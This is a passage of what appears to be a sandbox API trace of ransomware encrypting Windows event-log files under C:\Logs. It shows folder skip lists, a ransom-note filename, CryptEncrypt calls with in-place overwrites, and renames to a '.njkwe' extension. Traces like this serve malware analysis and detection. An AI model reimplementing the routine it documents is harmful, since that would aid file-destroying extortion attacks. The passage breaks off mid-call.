pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 63 [0066.440] StrStrIW (lpFirst="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.440] lstrcmpW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.440] lstrcmpW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="taridd") returned -1 [0066.440] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.440] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.440] GetTickCount () returned 0x1151019 [0066.440] GetTickCount () returned 0x1151019 [0066.440] GetTickCount () returned 0x1151019 [0066.440] GetTickCount () returned 0x1151019 [0066.440] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.440] GetProcessHeap () returned 0xbe0000 [0066.440] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.440] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.445] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.446] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.446] GetProcessHeap () returned 0xbe0000 [0066.446] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.446] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.446] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.446] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.446] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.446] CloseHandle (hObject=0x428) returned 1 [0066.448] GetProcessHeap () returned 0xbe0000 [0066.448] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.448] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 83 [0066.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.449] GetProcessHeap () returned 0xbe0000 [0066.449] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.449] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0066.449] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="Windows") returned -1 [0066.449] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.449] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.449] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="Program Files") returned -1 [0066.449] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.449] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 61 [0066.449] StrStrIW (lpFirst="Microsoft-Windows-International%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.449] lstrcmpW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.449] lstrcmpW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="taridd") returned -1 [0066.449] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.449] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.450] GetTickCount () returned 0x1151029 [0066.450] GetTickCount () returned 0x1151029 [0066.450] GetTickCount () returned 0x1151029 [0066.450] GetTickCount () returned 0x1151029 [0066.450] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.450] GetProcessHeap () returned 0xbe0000 [0066.450] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.450] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.452] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.452] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.452] GetProcessHeap () returned 0xbe0000 [0066.452] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.452] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.452] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.452] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.452] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.452] CloseHandle (hObject=0x428) returned 1 [0066.454] GetProcessHeap () returned 0xbe0000 [0066.454] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.454] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 81 [0066.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.455] GetProcessHeap () returned 0xbe0000 [0066.455] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.455] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0066.455] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="Windows") returned -1 [0066.455] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.455] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.455] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="Program Files") returned -1 [0066.455] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.455] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 59 [0066.455] StrStrIW (lpFirst="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.455] lstrcmpW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.455] lstrcmpW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="taridd") returned -1 [0066.455] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.455] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.456] GetTickCount () returned 0x1151029 [0066.456] GetTickCount () returned 0x1151029 [0066.456] GetTickCount () returned 0x1151029 [0066.456] GetTickCount () returned 0x1151029 [0066.456] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.456] GetProcessHeap () returned 0xbe0000 [0066.456] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.456] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.458] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.458] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.458] GetProcessHeap () returned 0xbe0000 [0066.458] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.458] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.458] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.458] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.458] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.458] CloseHandle (hObject=0x428) returned 1 [0066.460] GetProcessHeap () returned 0xbe0000 [0066.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.460] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0066.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.461] GetProcessHeap () returned 0xbe0000 [0066.461] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.461] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0066.461] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="Windows") returned -1 [0066.461] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.461] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.461] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="Program Files") returned -1 [0066.461] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.461] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 61 [0066.461] StrStrIW (lpFirst="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.461] lstrcmpW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.461] lstrcmpW (lpString1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpString2="taridd") returned -1 [0066.461] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.461] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.461] GetTickCount () returned 0x1151029 [0066.461] GetTickCount () returned 0x1151029 [0066.461] GetTickCount () returned 0x1151029 [0066.462] GetTickCount () returned 0x1151039 [0066.462] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.462] GetProcessHeap () returned 0xbe0000 [0066.462] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.462] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.464] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.464] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.464] GetProcessHeap () returned 0xbe0000 [0066.464] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.464] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.464] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.464] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.464] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.464] CloseHandle (hObject=0x428) returned 1 [0066.466] GetProcessHeap () returned 0xbe0000 [0066.466] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.466] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 81 [0066.467] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.467] GetProcessHeap () returned 0xbe0000 [0066.467] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.467] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0066.467] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="Windows") returned -1 [0066.467] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="$Recycle.bin") returned 1 [0066.468] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="System Volume Information") returned -1 [0066.468] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="Program Files") returned -1 [0066.468] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="Program Files (x86)") returned -1 [0066.468] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 60 [0066.468] StrStrIW (lpFirst="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpSrch=".njkwe") returned 0x0 [0066.468] lstrcmpW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.468] lstrcmpW (lpString1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpString2="taridd") returned -1 [0066.468] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.468] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.468] GetTickCount () returned 0x1151039 [0066.468] GetTickCount () returned 0x1151039 [0066.468] GetTickCount () returned 0x1151039 [0066.468] GetTickCount () returned 0x1151039 [0066.468] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.468] GetProcessHeap () returned 0xbe0000 [0066.468] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.468] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.470] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.470] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.470] GetProcessHeap () returned 0xbe0000 [0066.470] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.470] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.470] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.473] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.473] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, 